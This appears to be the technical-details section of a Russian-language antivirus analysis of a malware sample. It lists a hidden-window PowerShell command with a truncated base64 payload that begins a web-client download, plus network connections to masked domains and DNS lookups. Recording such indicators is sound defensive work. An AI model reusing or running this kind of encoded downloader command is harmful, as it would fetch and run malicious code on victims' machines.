Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQANQAzADAANgA2AD0AKAAnAEsAJwArACcAMAA2ADIAMQA1ACcAKQA7ACQAbwBfADYAOABfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcQBfADEAMwBfADcAXwA9ACgAJwBoAHQAdABwAC...
- 'ho#####nglighting.com':80
- 'br####freight.co.za':80
- http://ho#####nglighting.com/03q47xywwOugYVF
- http://br####freight.co.za/keFNCAwCOCUbkf_lTFb
- DNS ASK em###ired.com
- DNS ASK ho#####nglighting.com
- DNS ASK br####freight.co.za
- DNS ASK cb###lanet.ch
- DNS ASK fo###o360.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQANQAzADAANgA2AD0AKAAnAEsAJwArACcAMAA2ADIAMQA1ACcAKQA7ACQAbwBfADYAOABfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcQBfADEAMwBfADcAXwA9ACgAJwBoAHQAdABwAC...' (со скрытым окном)